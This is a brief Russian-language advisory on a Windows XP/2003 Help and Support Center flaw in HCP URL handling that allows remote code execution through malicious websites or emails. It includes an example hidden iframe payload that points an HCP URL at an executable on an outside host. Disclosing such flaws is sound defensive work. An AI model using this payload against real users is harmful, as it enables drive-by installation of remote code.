Программа: Windows XP/2003
Уязвимость обнаружена в Help and Support Center в обработке HCP URL. Удаленный атакующий может скомпрометировать уязвимую систему.
Удаленный атакующий может сконструировать специально обработанный HCP URL, который выполнит произвольный код в браузере пользователя, посетившего злонамеренный Web сайт или просмотревшего злонамеренное email сообщение.
Пример:
<iframe src="HCP://system/DVDUpgrd/dvdupgrd.htm? website=exploitlabs.com/msnspoof/poc/
dvdupgd/dvdupgd.exe" width="1" height="1">
</iframe>
